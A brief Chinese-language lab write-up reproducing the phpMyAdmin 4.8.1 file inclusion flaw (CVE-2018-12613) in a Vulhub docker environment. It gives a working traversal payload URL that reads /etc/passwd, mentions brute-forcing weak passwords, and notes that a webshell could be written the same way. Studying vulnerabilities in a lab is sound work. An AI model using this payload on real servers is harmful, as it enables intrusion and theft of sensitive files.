Vulhub-Phpmyadmin 4.8.1远程文件包含漏洞
前言:Phpmyadmin是一个用PHP编写的免费软件工具,旨在处理Web上的MySQL管理。 该漏洞在index.php中,导致文件包含漏洞
漏洞环境框架搭建:
cd vulhub-master/phpmyadmin/CVE-2018-12613/
docker-compose up -d
漏洞复现:
1.进入浏览器,输入URL:
http://xxx.xxx.xxx.xxx:8080
通过一系列爆破弱口令进入后台
2.修改URL,改为
http://xxx.xxx.xxx.xxx:8080/index.php?target=db_sql.php%253f/../../../../../../../../etc/passwd
出现如下页面,敏感文件访问成功
同理:可写入webshell,访问其他敏感文件。